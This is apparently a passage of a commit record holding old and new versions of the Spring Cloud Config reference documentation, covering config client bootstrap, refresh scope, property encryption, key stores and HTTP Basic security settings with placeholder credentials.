Spring\nConfig Server (or other external property sources provided by the\napplication developer), and it will also pick up some additional\nuseful features related to `Environment` change events.\n\n[[config-first-bootstrap]]\n=== Config First Bootstrap\n\nThis is the default behaviour for any application which has the Spring\nCloud Config Client on the classpath. When a config client starts up\nit binds to the Config Server (via the bootstrap configuration\nproperty `spring.cloud.config.uri`) and initializes Spring\n`Environment` with remote property sources.\n\nThe net result of this is that all client apps that want to consume\nthe Config Server need a `bootstrap.yml` (or an environment variable)\nwith the server address in `spring.cloud.config.uri` (defaults to\n\"http:\/\/localhost:8888\").\n\n[[eureka-first-bootstrap]]\n=== Eureka First Bootstrap\n\nIf you are using Spring Cloud Netflix and Eureka Service Discovery,\nthen you can have the Config Server register with Eureka if you want\nto, but in the default \"Config First\" mode, clients won't be able to\ntake advantage of the registration.\n\nIf you prefer to use Eureka to locate the Config Server, you can do\nthat by setting `spring.cloud.config.discovery.enabled=true` (default\n\"false\"). The net result of that is that client apps all need a\n`bootstrap.yml` (or an environment variable) with the Eureka server\naddress, e.g. in `eureka.client.serviceUrl.defaultZone`. The price\nfor using this option is an extra network round trip on start up to\nlocate the service registration. The benefit is that the Config Server\ncan change its co-ordinates, as long as Eureka is a fixed point.\n\n[[config-client-fail-fast]]\n=== Config Client Fail Fast\n\nIn some cases, it may be desirable to fail startup of a service if\nit cannot connect to the Config Server. If this is the desired\nbehavior, set the bootstrap configuration property\n`spring.cloud.config.failFast=true` and the client will halt with\nan Exception.\n\n=== Environment Changes\n\nThe application will listen for an `EnvironmentChangedEvent` and react\nto the change in a couple of standard ways (additional\n`ApplicationListeners` can be added as `@Beans` by the user in the\nnormal way). When an `EnvironmentChangedEvent` is observed it will\nhave a list of key values that have changed, and the application will\nuse those to:\n\n* Re-bind any `@ConfigurationProperties` beans in the context\n* Set the logger levels for any properties in `logging.level.*`\n\nNote that the Config Client does not by default poll for changes in\nthe `Environment`, and generally we would not recommend that approach\nfor detecting changes (although you could set it up with a\n`@Scheduled` annotation). If you have a scaled-out client application\nthen it is better to broadcast the `EnvironmentChangedEvent` to all\nthe instances instead of having them polling for changes (e.g. using\nthe https:\/\/github.com\/spring-cloud\/spring-cloud-bus[Spring Cloud\nBus]).\n\nThe `EnvironmentChangedEvent` covers a large class of refresh use\ncases, as long as you can actually make a change to the `Environment`\nand publish the event (those APIs are public and part of core\nSpring). You can verify the changes are bound to\n`@ConfigurationProperties` beans by visiting the `\/configprops`\nendpoint (normal Spring Boot Actuator feature). For instance a\n`DataSource` can have its `maxPoolSize` changed at runtime (the\ndefault `DataSource` created by Spring Boot is an\n`@ConfigurationProperties` bean) and grow capacity\ndynamically. Re-binding `@ConfigurationProperties` does not cover\nanother large class of use cases, where you need more control over the\nrefresh, and where you need a change to be atomic over the whole\n`ApplicationContext`. To address those concerns we have\n`@RefreshScope`.\n\n=== Refresh Scope\n\nA Spring `@Bean` that is marked as `@RefreshScope` will get special\ntreatment when there is a configuration change. This addresses the\nproblem of stateful beans that only get their configuration injected\nwhen they are initialized. For instance if a `DataSource` has open\nconnections when the database URL is changed via the `Environment`, we\nprobably want the holders of those connections to be able to complete\nwhat they are doing. Then the next time someone borrows a connection\nfrom the pool he gets one with the new URL.\n\nRefresh scope beans are lazy proxies that initialize when they are\nused (i.e. when a method is called), and the scope acts as a cache of\ninitialized values. To force a bean to re-initialize on the next\nmethod call you just need to invalidate its cache entry.\n\nThe `RefreshScope` is a bean in the context and it has a public method\n`refreshAll()` to refresh all beans in the scope by clearing the\ntarget cache. There is also a `refresh(String)` method to refresh an\nindividual bean by name. This functionality is exposed in the\n`\/refresh` endpoint (over HTTP or JMX).\n\nNOTE: `@RefreshScope` works (technically) on an `@Configuration`\nclass, but it might lead to surprising behaviour: e.g. it does *not*\nmean that all the `@Beans` defined in that class are themselves\n`@RefreshScope`. Specifically, anything that depends on those beans\ncannot rely on them being updated when a refresh is initiated, unless\nit is itself in `@RefreshScope` (in which it will be rebuilt on a\nrefresh and its dependencies re-injected, at which point they will be\nre-initialized from the refreshed `@Configuration`).\n\n=== Encryption and Decryption\n\nThe Config Client has an `Environment` pre-processor for decrypting\nproperty values locally. It follows the same rules as the Config\nServer, and has the same external configuration via `encrypt.\\*`. Thus\nyou can use encrypted values in the form `{cipher}*` and as long as\nthere is a valid key then they will be decrypted before the main\napplication context gets the `Environment`.\n\n=== Endpoints\n\nFor a Spring Boot Actuator application there are some additional management endpoints:\n\n* POST to `\/env` to update the `Environment` and rebind `@ConfigurationProperties` and log levels\n* `\/refresh` for re-loading the boot strap context and refreshing the `@RefreshScope` beans\n* `\/restart` for closing the `ApplicationContext` and restarting it (disabled by default)\n* `\/pause` and `\/resume` for calling the `Lifecycle` methods (`stop()` and `start()` on the `ApplicationContext`)\n\n\n=== Locating Remote Configuration Resources\n\nThe Config Service serves property sources from `\/{name}\/{env}\/{label}`, where the default bindings in the\nclient app are\n\n* \"name\" = `${spring.application.name}`\n* \"env\" = `${spring.profiles.active}` (actually `Environment.getActiveProfiles()`)\n* \"label\" = \"master\"\n\nAll of them can be overridden by setting `spring.cloud.config.\\*`\n(where `*` is \"name\", \"env\" or \"label\"). The \"label\" is useful for\nrolling back to previous versions of configuration; with the default\nConfig Server implementation it can be a git label, branch name or\ncommit id.\n\n=== The Bootstrap Application Context\n\nThe Config Client operates by creating a \"bootstrap\" application\ncontext, which is a parent context for the main application. Out of\nthe box it is responsible for loading configuration properties from\nthe Config Server, and also decrypting properties in the local\nexternal configuration files. The two contexts share an `Environment`\nwhich is the source of external properties for any Spring\napplication. Bootstrap properties are added with high precedence, so\nthey cannot be overridden by local configuration.\n\nThe bootstrap context uses a different convention for locating\nexternal configuration than the main application context, so instead\nof `application.yml` (or `.properties`) you use `bootstrap.yml`,\nkeeping the external configuration for bootstrap and main context\nnicely separate. Example:\n\n.bootstrap.yml\n----\nspring:\n application:\n name: foo\n cloud:\n config:\n uri: ${SPRING_CONFIG_URI:http:\/\/localhost:8888}\n----\n\nIt is a good idea to set the `spring.application.name` (in\n`bootstrap.yml` or `application.yml`) if your application needs any\napplication-specific configuration from the server.\n\nYou can disable the bootstrap process completely by setting\n`spring.cloud.bootstrap.enabled=false` (e.g. in System properties).\n\n=== Application Context Hierarchies\n\nIf you build an application context from `SpringApplication` or\n`SpringApplicationBuilder`, then the Bootstrap context is added as a\nparent to that context. It is a feature of Spring that child contexts\ninherit property sources and profiles from their parent, so the \"main\"\napplication context will contain additional property sources, compared\nto building the same context without Spring Cloud Config. The\nadditional property sources are:\n\n* \"bootstrap\": an optional `CompositePropertySource` appears with high\npriority if any `PropertySourceLocators` are found in the Bootstrap\ncontext, and they have non-empty properties. An example would be\nproperties from the Spring Cloud Config Server. See\nlink:#customizing-bootstrap-property-sources[below] for instructions\non how to customize the contents of this property source.\n\n* \"applicationConfig: [classpath:bootstrap.yml]\" (and friends if\nSpring profiles are active). If you have a `bootstrap.yml` (or\nproperties) then those properties are used to configure the Bootstrap\ncontext, and then they get added to the child context when its parent\nis set. They have lower precedence than the `application.yml` (or\nproperties) and any other property sources that are added to the child\nas a normal part of the process of creating a Spring Boot\napplication. See link:#customizing-bootstrap-properties[below] for\ninstructions on how to customize the contents of these property\nsources.\n\nBecause of the ordering rules of property sources the \"bootstrap\"\nentries take precedence, but note that these do not contain any data\nfrom `bootstrap.yml`, which has very low precedence, but can be used\nto set defaults.\n\nYou can extend the context hierarchy by simply setting the parent\ncontext of any `ApplicationContext` you create, e.g. using its own\ninterface, or with the `SpringApplicationBuilder` convenience methods\n(`parent()`, `child()` and `sibling()`). The bootstrap context will be\nthe parent of the most senior ancestor that you create yourself.\nEvery context in the hierarchy will have its own \"bootstrap\" property\nsource (possibly empty) to avoid promoting values inadvertently from\nparents down to their descendants. Every context in the hierarchy can\nalso (in principle) have a different `spring.application.name` and\nhence a different remote property source if there is a Config\nServer. Normal Spring application context behaviour rules apply to\nproperty resolution: properties from a child context override those in\nthe parent, by name and also by property source name (if the child has\na property source with the same name as the parent, the one from the\nparent is not included in the child).\n\nNote that the `SpringApplicationBuilder` allows you to share an\n`Environment` amongst the whole hierarchy, but that is not the\ndefault. Thus, sibling contexts in particular do not need to have the\nsame profiles or property sources, even though they will share common\nthings with their parent. \n\n[[customizing-bootstrap-properties]]\n=== Changing the Location of Bootstrap Properties\n\nThe `bootstrap.yml` (or `.properties) location can be specified using\n`spring.cloud.bootstrap.name` (default \"bootstrap\") or\n`spring.cloud.bootstrap.location` (default empty), e.g. in System\nproperties. Those properties behave like the `spring.config.*`\nvariants with the same name, in fact they are used to set up the\nbootstrap `ApplicationContext` by setting those properties in its\n`Environment`. If there is an active profile (from\n`spring.profiles.active` or through the `Environment` API in the\ncontext you are building) then properties in that profile will be\nloaded as well, just like in a regular Spring Boot app, e.g. from\n`bootstrap-development.properties` for a \"development\" profile.\n\n=== Customizing the Bootstrap Configuration\n\nThe bootstrap context can be trained to do anything you like by adding\nentries to `\/META-INF\/spring.factories` under the key\n`org.springframework.cloud.bootstrap.BootstrapConfiguration`. This is\na comma-separated list of Spring `@Configuration` classes which will\nbe used to create the context. Any beans that you want to be available\nto the main application context for autowiring can be created here,\nand also there is a special contract for `@Beans` of type\n`ApplicationContextInitializer`.\n\nThe bootstrap process ends by injecting initializers into the main\n`SpringApplication` instance (i.e. the normal Spring Boot startup\nsequence, whether it is running as a standalone app or deployed in an\napplication server). First a bootstrap context is created from the\nclasses found in `spring.factories` and then all `@Beans` of type\n`ApplicationContextInitializer` are added to the main\n`SpringApplication` before it is started.\n\n[[customizing-bootstrap-property-sources]]\n=== Customizing the Bootstrap Property Sources\n\nThe default property source for external configuration added by the\nbootstrap process is the Config Server, but you can add additional\nsources by adding beans of type `PropertySourceLocator` to the\nbootstrap context (via `spring.factories`). You could use this to\ninsert additional properties from a different server, or from a\ndatabase, for instance.\n\nAs an example, consider the following trivial custom locator:\n\n[source,java]\n----\n@Configuration\npublic class CustomPropertySourceLocator implements PropertySourceLocator {\n\n @Override\n public PropertySource<?> locate(Environment environment) {\n return new MapPropertySource(\"customProperty\",\n Collections.<String, Object>singletonMap(\"property.from.sample.custom.source\", \"worked as intended\"));\n }\n\n}\n----\n\nThe `Environment` that is passed in is the one for the\n`ApplicationContext` about to be created, i.e. the one that we are\nsupplying additional property sources for. It will already have its\nnormal Spring Boot-provided property sources, so you can use those to\nlocate a property source specific to this `Environment` (e.g. by\nkeying it on the `spring.application.name`, as is done in the default\nConfig Server property source locator).\n\nIf you create a jar with this class in it and then add a\n`META-INF\/spring.factories` containing:\n\n----\norg.springframework.cloud.bootstrap.BootstrapConfiguration=sample.custom.CustomPropertySourceLocator\n----\n\nthen the \"customProperty\" `PropertySource` will show up in any\napplication that includes that jar on its classpath.\n\n=== Security\n\nIf you use HTTP Basic security on the server then clients just need to\nknow the password (and username if it isn't the default). You can do\nthat via the config server URI, or via separate username and password\nproperties, e.g.\n\n.bootstrap.yml\n----\nspring:\n cloud:\n config:\n uri: https:\/\/user:secret@myconfig.mycompany.com\n----\n\nor\n\n.bootstrap.yml\n----\nspring:\n cloud:\n config:\n uri: https:\/\/myconfig.mycompany.com\n username: user\n password: secret\n----\n\nThe `spring.cloud.config.password` and `spring.cloud.config.username`\nvalues override anything that is provided in the URI.\n\nIf you deploy your apps on Cloud Foundry then the best way to provide\nthe password is through service credentials, e.g. in the URI, since\nthen it doesn't even need to be in a config file. An example which\nworks locally and for a user-provided service on Cloud Foundry named\n\"configserver\":\n\n.bootstrap.yml\n----\nspring:\n cloud:\n config:\n uri: ${vcap.services.configserver.credentials.uri:http:\/\/user:password@localhost:8888}\n\n----\n\nIf you use another form of security you might need to provide a\n`RestTemplate` to the `ConfigServicePropertySourceLocator` (e.g. by\ngrabbing it in the bootstrap context and injecting one).\n\n","old_contents":"= Spring Cloud Config\n:toc:\n\ninclude::intro.adoc[]\n\n== Quick Start\n\ninclude::quickstart.adoc[]\n\n== Spring Cloud Config Server\n\nThe Server provides an HTTP, resource-based API for external\nconfiguration (name-value pairs, or equivalent YAML content). The\nserver is easily embeddable in a Spring Boot application using the\n`@EnableConfigServer` annotation.\n\n=== Environment Repository\n\nWhere do you want to store the configuration data for the Config\nServer? The strategy that governs this behaviour is the\n`EnvironmentRepository`, serving `Environment` objects. This\n`Environment` is a shallow copy of the domain from the Spring\n`Environment` (including `propertySources` as the main feature). The\n`Environment` resources are parametrized by three variables:\n\n\n* `{application}` maps to \"spring.application.name\" on the client side;\n\n* `{profile}` maps to \"spring.active.profiles\" on the client (comma separated list); and \n\n* `{label}` which is a server side feature labelling a \"versioned\" set of config files.\n\nRepository implementations generally behave just like a Spring Boot\napplication loading configuration files from a \"spring.config.name\"\nequal to the `{application}` parameter, and \"spring.profiles.active\"\nequal to the `{profiles}` parameter. Precedence rules for profiles are\nalso the same as in a regular Boot application: active profiles take\nprecedence over defaults, and if there are multiple profiles the last\none wins (like adding entries to a `Map`).\n\nExample: a client application has this bootstrap configuration:\n\n.bootstrap.yml\n----\nspring:\n application:\n name: foo\n profiles:\n active: dev,mysql\n----\n\n(as usual with a Spring Boot application, these properties could also\nbe set as environment variables or command line arguments). \n\nIf the repository is file-based, the server will create an\n`Environment` from `application.yml` (shared between all clients), and\n`foo.yml` (with `foo.yml` taking precedence). If the YAML files have\ndocuments inside them that point to Spring profiles, those are applied\nwith higher precendence (in order of the profiles listed), and if\nthere are profile-specific YAML (or properties) files these are also\napplied with higher precedence than the defaults. Higher precendence\ntranslates to a `PropertySource` listed earlier in the\n`Environment`. (These are the same rules as apply in a standalone\nSpring Boot application.)\n\n==== Git Backend\n\nThe default implementation of `EnvironmentRepository` uses a Git\nbackend, which is very convenient for managing upgrades and physical\nenvironments, and also for auditing changes. To change the location of\nthe repository you can set the \"spring.cloud.config.server.git.uri\"\nconfiguration property in the Config Server (e.g. in\n`application.yml`). If you set it with a `file:` prefix it should work\nfrom a local repository so you can get started quickly and easily\nwithout a server, but in that case the server operates directly on the\nlocal repository without cloning it (it doesn't matter if it's not\nbare because the Config Server never makes changes to the \"remote\"\nrepository). To scale the Config Server up and make it highly\navailable, you would need to have all instances of the server pointing\nto the same repository, so only a shared file system would work. Even\nin that case it is better to use the `ssh:` protocol for a shared\nfilesystem repository, so that the server can clone it and use a local\nworking copy as a cache.\n\nThis repository implementation maps the `{label}` parameter of the\nHTTP resource to a git label (commit id, branch name or tag).\n\n==== File System Backend\n\nThere is also a \"native\" profile in the Config Server that doesn't use\nGit, but just loads the config files from the local classpath or file\nsystem (any static URL you want to point to with\n\"spring.cloud.config.server.native.locations\"). To use the native\nprofile just launch the Config Server with\n\"spring.profiles.active=native\". \n\nThis repository implementation maps the `{label}` parameter of the\nHTTP resource to a suffix on the search path, so properties files are\nloaded from each search location *and* a subdirectory with the same\nname as the label (the labelled properties take precedence in the\nSpring Environment).\n\n=== Security\n\nYou are free to secure your Config Server in any way that makes sense\nto you (from physical network security to OAuth2 bearer\ntokens), and Spring Security and Spring Boot make it easy to do pretty\nmuch anything. \n\nTo use the default Spring Boot configured HTTP Basic security, just\ninclude Spring Security on the classpath (e.g. through\n`spring-boot-starter-security`). The default is a username of \"user\"\nand a randomly generated password, which isn't going to be very useful\nin practice, so we recommend you configure the password (via\n`security.user.password`) and encrypt it (see below for instructions\non how to do that).\n\n=== Encryption and Decryption\n\nIMPORTANT: **Prerequisites:** to use the encryption and decryption features\nyou need the full-strength JCE installed in your JVM (it's not there by default).\nYou can download the \"Java Cryptography Extension (JCE) Unlimited Strength Jurisdiction Policy Files\"\nfrom Oracle, and follow instructions for installation (essentially replace the 2 policy files\nin the JRE lib\/security directory with the ones that you downloaded).\n\nThe server exposes `\/encrypt` and `\/decrypt` endpoints (on the\nassumption that these will be secured and only accessed by authorized\nagents). If the remote property sources contain encryted content\n(values starting with `{cipher}`) they will be decrypted before\nsending to clients over HTTP. The main advantage of this set up is\nthat the property values don't have to be in plain text when they are\n\"at rest\" (e.g. in a git repository). If a value cannot be decrypted\nit is replaced with an empty string, largely to prevent cipher text\nbeing used as a password in Spring Boot autconfigured HTTP basic.\n\nIf you are setting up a remote config repository for config client\napplications it might contain an `application.yml` like this, for\ninstance:\n\n.application.yml\n----\nspring:\n datasource:\n username: dbuser\n password: {cipher}FKSAJDFGYOS8F7GLHAKERGFHLSAJ\n----\n\nYou can safely push this plain text to a shared git repository and the\nsecret password is protected.\n\nIf you are editing a remote config file you can use the Config Server\nto encrypt values by POSTing to the `\/encrypt` endpoint, e.g.\n\n----\n$ curl localhost:8888\/encrypt -d mysecret\n682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\n----\n\nThe inverse operation is also available via `\/decrypt` (provided the server is\nconfigured with a symmetric key or a full key pair):\n\n----\n$ curl localhost:8888\/decrypt -d 682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\nmysecret\n----\n\nTake the encypted value and add the `{cipher}` prefix before you put\nit in the YAML or properties file, and before you commit and push it\nto a remote, potentially insecure store.\n\nThe `spring` command line client (with Spring Cloud CLI extensions\ninstalled) can also be used to encrypt and decrypt, e.g.\n\n----\n$ spring encrypt mysecret --key foo\n682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\n$ spring decrypt --key foo 682bc583f4641835fa2db009355293665d2647dade3375c0ee201de2a49f7bda\nmysecret\n----\n\nTo use a key in a file (e.g. an RSA public key for encyption) prepend\nthe key value with \"@\" and provide the file path, e.g.\n\n----\n$ spring encrypt mysecret --key @${HOME}\/.ssh\/id_rsa.pub\nAQAjPgt3eFZQXwt8tsHAVv\/QHiY5sI2dRcR+...\n----\n\n=== Key Management\n\nThe Config Server can use a symmetric (shared) key or an asymmetric\none (RSA key pair). The asymmetric choice is superior in terms of\nsecurity, but it is often more convenient to use a symmetric key since\nit is just a single property value to configure.\n\nTo configure a symmetric key you just need to set `encrypt.key` to a\nsecret String (or use an enviroment variable `ENCRYPT_KEY` to keep it\nout of plain text configuration files). You can also POST a key value\nto the `\/key` endpoint (but that won't change any existing encrypted\nvalues in remote repositories).\n\nTo configure an asymmetric key you can either set the key as a\nPEM-encoded text value (in `encrypt.key`), or via a keystore (e.g. as\ncreated by the `keytool` utility that comes with the JDK). The\nkeystore properties are `encrypt.keyStore.\\*` with `*` equal to\n\n* `location` (a `Resource` location), \n* `password` (to unlock the keystore) and \n* `alias` (to identify which key in the store is to be\nused).\n\nThe encryption is done with the public key, and a private key is\nneeded for decryption. Thus in principle you can configure only the\npublic key in the server if you only want to do encryption (and are\nprepared to decrypt the values yourself locally with the private\nkey). In practice you might not want to do that because it spreads the\nkey management process around all the clients, instead of\nconcentrating it in the server. On the other hand it's a useful option\nif your config server really is relatively insecure and only a\nhandful of clients need the encrypted properties.\n\n=== Creating a Key Store for Testing\n\nTo create a keystore for testing you can do something like this:\n\n----\n$ keytool -genkeypair -alias mytestkey -keyalg RSA \\\n -dname \"CN=Web Server,OU=Unit,O=Organization,L=City,S=State,C=US\" \\\n -keypass changeme -keystore server.jks -storepass letmein\n----\n\nPut the `server.jks` file in the classpath (for instance) and then in\nyour `application.yml` for the Config Server:\n\n----\nencrypt:\n keyStore:\n location: classpath:\/server.jks\n alias: mytestkey\n password: letmein\n----\n\n=== Embedding the Config Server\n\nThe Config Server runs best as a standalone application, but if you\nneed to you can embed it in another application. Just use the\n`@EnableConfigServer` annotation and (optionally) set\n`spring.cloud.config.server.prefix` to a path prefix, e.g. \"\/config\",\nto serve the resources under a prefix. The prefix should start but not\nend with a \"\/\". It is applied to the `@RequestMappings` in the Config\nServer (i.e. underneath the Spring Boot prefixes `server.servletPath`\nand `server.contextPath`).\n\n== Spring Cloud Config Client\n\nA Spring Boot application can take immediate advantage of the Spring\nConfig Server (or other external property sources provided by the\napplication developer), and it will also pick up some additional\nuseful features related to `Environment` change events.\n\n[[config-first-bootstrap]]\n=== Config First Bootstrap\n\nThis is the default behaviour for any application which has the Spring\nCloud Config Client on the classpath. When a config client starts up\nit binds to the Config Server (via the bootstrap configuration\nproperty `spring.cloud.config.uri`) and initializes Spring\n`Environment` with remote property sources.\n\nThe net result of this is that all client apps that want to consume\nthe Config Server need a `bootstrap.yml` (or an environment variable)\nwith the server address in `spring.cloud.config.uri` (defaults to\n\"http:\/\/localhost:8888\").\n\n[[eureka-first-bootstrap]]\n=== Eureka First Bootstrap\n\nIf you are using Spring Cloud Netflix and Eureka Service Discovery,\nthen you can have the Config Server register with Eureka if you want\nto, but in the default \"Config First\" mode, clients won't be able to\ntake advantage of the registration.\n\nIf you prefer to use Eureka to locate the Config Server, you can do\nthat by setting `spring.cloud.config.discovery.enabled=true` (default\n\"false\"). The net result of that is that client apps all need a\n`bootstrap.yml` (or an environment variable) with the Eureka server\naddress, e.g. in `eureka.client.serviceUrl.defaultZone`. The price\nfor using this option is an extra network round trip on start up to\nlocate the service registration. The benefit is that the Config Server\ncan change its co-ordinates, as long as Eureka is a fixed point.\n\n[[config-client-fail-fast]]\n=== Config Client Fail Fast\n\nIn some cases, it may be desirable to fail startup of a service if\nit cannot connect to the Config Server. If this is the desired\nbehavior, set the bootstrap configuration property\n`spring.cloud.config.failFast=true` and the client will halt with\nan Exception.\n\n=== Environment Changes\n\nThe application will listen for an `EnvironmentChangedEvent` and react\nto the change in a couple of standard ways (additional\n`ApplicationListeners` can be added as `@Beans` by the user in the\nnormal way). When an `EnvironmentChangedEvent` is observed it will\nhave a list of key values that have changed, and the application will\nuse those to:\n\n* Re-bind any `@ConfigurationProperties` beans in the context\n* Set the logger levels for any properties in `logging.level.*`\n\nNote that the Config Client does not by default poll for changes in\nthe `Environment`, and generally we would not recommend that approach\nfor detecting changes (although you could set it up with a\n`@Scheduled` annotation). If you have a scaled-out client application\nthen it is better to broadcast the `EnvironmentChangedEvent` to all\nthe instances instead of having them polling for changes (e.g. using\nthe https:\/\/github.com\/spring-cloud\/spring-cloud-bus[Spring Cloud\nBus]).\n\nThe `EnvironmentChangedEvent` covers a large class of refresh use\ncases, as long as you can actually make a change to the `Environment`\nand publish the event (those APIs are public and part of core\nSpring). You can verify the changes are bound to\n`@ConfigurationProperties` beans by visiting the `\/configprops`\nendpoint (normal Spring Boot Actuator feature). For instance a\n`DataSource` can have its `maxPoolSize` changed at runtime (the\ndefault `DataSource` created by Spring Boot is an\n`@ConfigurationProperties` bean) and grow capacity\ndynamically. Re-binding `@ConfigurationProperties` does not cover\nanother large class of use cases, where you need more control over the\nrefresh, and where you need a change to be atomic over the whole\n`ApplicationContext`. To address those concerns we have\n`@RefreshScope`.\n\n=== Refresh Scope\n\nA Spring `@Bean` that is marked as `@RefreshScope` will get special\ntreatment when there is a configuration change. This addresses the\nproblem of stateful beans that only get their configuration injected\nwhen they are initialized. For instance if a `DataSource` has open\nconnections when the database URL is changed via the `Environment`, we\nprobably want the holders of those connections to be able to complete\nwhat they are doing. Then the next time someone borrows a connection\nfrom the pool he gets one with the new URL.\n\nRefresh scope beans are lazy proxies that initialize when they are\nused (i.e. when a method is called), and the scope acts as a cache of\ninitialized values. To force a bean to re-initialize on the next\nmethod call you just need to invalidate its cache entry.\n\nThe `RefreshScope` is a bean in the context and it has a public method\n`refreshAll()` to refresh all beans in the scope by clearing the\ntarget cache. There is also a `refresh(String)` method to refresh an\nindividual bean by name. This functionality is exposed in the\n`\/refresh` endpoint (over HTTP or JMX).\n\nNOTE: `@RefreshScope` works (technically) on an `@Configuration`\nclass, but it might lead to surprising behaviour: e.g. it does *not*\nmean that all the `@Beans` defined in that class are themselves\n`@RefreshScope`. Specifically, anything that depends on those beans\ncannot rely on them being updated when a refresh is initiated, unless\nit is itself in `@RefreshScope` (in which it will be rebuilt on a\nrefresh and its dependencies re-injected, at which point they will be\nre-initialized from the refreshed `@Configuration`).\n\n=== Encryption and Decryption\n\nThe Config Client has an `Environment` pre-processor for decrypting\nproperty values locally. It follows the same rules as the Config\nServer, and has the same external configuration via `encrypt.\\*`. Thus\nyou can use encrypted values in the form `{cipher}*` and as long as\nthere is a valid key then they will be decrypted before the main\napplication context gets the `Environment`.\n\n=== Endpoints\n\nFor a Spring Boot Actuator application there are some additional management endpoints:\n\n* POST to `\/env` to update the `Environment` and rebind `@ConfigurationProperties` and log levels\n* `\/refresh` for re-loading the boot strap context and refreshing the `@RefreshScope` beans\n* `\/restart` for closing the `ApplicationContext` and restarting it (disabled by default)\n* `\/pause` and `\/resume` for calling the `Lifecycle` methods (`stop()` and `start()` on the `ApplicationContext`)\n\n\n=== Locating Remote Configuration Resources\n\nThe Config Service serves property sources from `\/{name}\/{env}\/{label}`, where the default bindings in the\nclient app are\n\n* \"name\" = `${spring.application.name}`\n* \"env\" = `${spring.profiles.active}` (actually `Environment.getActiveProfiles()`)\n* \"label\" = \"master\"\n\nAll of them can be overridden by setting `spring.cloud.config.\\*`\n(where `*` is \"name\", \"env\" or \"label\"). The \"label\" is useful for\nrolling back to previous versions of configuration; with the default\nConfig Server implementation it can be a git label, branch name or\ncommit id.\n\n=== The Bootstrap Application Context\n\nThe Config Client operates by creating a \"bootstrap\" application\ncontext, which is a parent context for the main application. Out of\nthe box it is responsible for loading configuration properties from\nthe Config Server, and also decrypting properties in the local\nexternal configuration files. The two contexts share an `Environment`\nwhich is the source of external properties for any Spring\napplication. Bootstrap properties are added with high precedence, so\nthey cannot be overridden by local configuration.\n\nThe bootstrap context uses a different convention for locating\nexternal configuration than the main application context, so instead\nof `application.yml` (or `.properties`) you use `bootstrap.yml`,\nkeeping the external configuration for bootstrap and main context\nnicely separate. Example:\n\n.bootstrap.yml\n----\nspring:\n application:\n name: foo\n cloud:\n config:\n uri: ${SPRING_CONFIG_URI:http:\/\/localhost:8888}\n----\n\nIt is a good idea to set the `spring.application.name` (in\n`bootstrap.yml` or `application.yml`) if your application needs any\napplication-specific configuration from the server.\n\nYou can disable the bootstrap process completely by setting\n`spring.cloud.bootstrap.enabled=false` (e.g. in System properties).\n\n=== Application Context Hierarchies\n\nIf you build an application context from `SpringApplication` or\n`SpringApplicationBuilder`, then the Bootstrap context is added as a\nparent to that context. It is a feature of Spring that child contexts\ninherit property sources and profiles from their parent, so the \"main\"\napplication context will contain additional property sources, compared\nto building the same context without Spring Cloud Config. The\nadditional property sources are:\n\n* \"bootstrap\": an optional `CompositePropertySource` appears with high\npriority if any `PropertySourceLocators` are found in the Bootstrap\ncontext, and they have non-empty properties. An example would be\nproperties from the Spring Cloud Config Server. See\nlink:#customizing-bootstrap-property-sources[below] for instructions\non how to customize the contents of this property source.\n\n* \"applicationConfig: [classpath:bootstrap.yml]\" (and friends if\nSpring profiles are active). If you have a `bootstrap.yml` (or\nproperties) then those properties are used to configure the Bootstrap\ncontext, and then they get added to the child context when its parent\nis set. They have lower precedence than the `application.yml` (or\nproperties) and any other property sources that are added to the child\nas a normal part of the process of creating a Spring Boot\napplication. See link:#customizing-bootstrap-properties[below] for\ninstructions on how to customize the contents of these property\nsources.\n\nBecause of the ordering rules of property sources the \"bootstrap\"\nentries take precedence, but note that these do not contain any data\nfrom `bootstrap.yml`, which has very low precedence, but can be used\nto set defaults.\n\nYou can extend the context hierarchy by simply setting the parent\ncontext of any `ApplicationContext` you create, e.g. using its own\ninterface, or with the `SpringApplicationBuilder` convenience methods\n(`parent()`, `child()` and `sibling()`). The bootstrap context will be\nthe parent of the most senior ancestor that you create yourself.\nEvery context in the hierarchy will have its own \"bootstrap\" property\nsource (possibly empty) to avoid promoting values inadvertently from\nparents down to their descendants. Every context in the hierarchy can\nalso (in principle) have a different `spring.application.name` and\nhence a different remote property source if there is a Config\nServer. Normal Spring application context behaviour rules apply to\nproperty resolution: properties from a child context override those in\nthe parent, by name and also by property source name (if the child has\na property source with the same name as the parent, the one from the\nparent is not included in the child).\n\nNote that the `SpringApplicationBuilder` allows you to share an\n`Environment` amongst the whole hierarchy, but that is not the\ndefault. Thus, sibling contexts in particular do not need to have the\nsame profiles or property sources, even though they will share common\nthings with their parent. \n\n[[customizing-bootstrap-properties]]\n=== Changing the Location of Bootstrap Properties\n\nThe `bootstrap.yml` (or `.properties) location can be specified using\n`spring.cloud.bootstrap.name` (default \"bootstrap\") or\n`spring.cloud.bootstrap.location` (default empty), e.g. in System\nproperties. Those properties behave like the `spring.config.*`\nvariants with the same name, in fact they are used to set up the\nbootstrap `ApplicationContext` by setting those properties in its\n`Environment`. If there is an active profile (from\n`spring.profiles.active` or through the `Environment` API in the\ncontext you are building) then properties in that profile will be\nloaded as well, just like in a regular Spring Boot app, e.g. from\n`bootstrap-development.properties` for a \"development\" profile.\n\n=== Customizing the Bootstrap Configuration\n\nThe bootstrap context can be trained to do anything you like by adding\nentries to `\/META-INF\/spring.factories` under the key\n`org.springframework.cloud.bootstrap.BootstrapConfiguration`. This is\na comma-separated list of Spring `@Configuration` classes which will\nbe used to create the context. Any beans that you want to be available\nto the main application context for autowiring can be created here,\nand also there is a special contract for `@Beans` of type\n`ApplicationContextInitializer`.\n\nThe bootstrap process ends by injecting initializers into the main\n`SpringApplication` instance (i.e. the normal Spring Boot startup\nsequence, whether it is running as a standalone app or deployed in an\napplication server). First a bootstrap context is created from the\nclasses found in `spring.factories` and then all `@Beans` of type\n`ApplicationContextInitializer` are added to the main\n`SpringApplication` before it is started.\n\n[[customizing-bootstrap-property-sources]]\n=== Customizing the Bootstrap Property Sources\n\nThe default property source for external configuration added by the\nbootstrap process is the Config Server, but you can add additional\nsources by adding beans of type `PropertySourceLocator` to the\nbootstrap context (via `spring.factories`). You could use this to\ninsert additional properties from a different server, or from a\ndatabase, for instance.\n\nAs an example, consider the following trivial custom locator:\n\n[source,java]\n----\n@Configuration\npublic class CustomPropertySourceLocator implements PropertySourceLocator {\n\n @Override\n public PropertySource<?> locate(Environment environment) {\n return new MapPropertySource(\"customProperty\",\n Collections.<String, 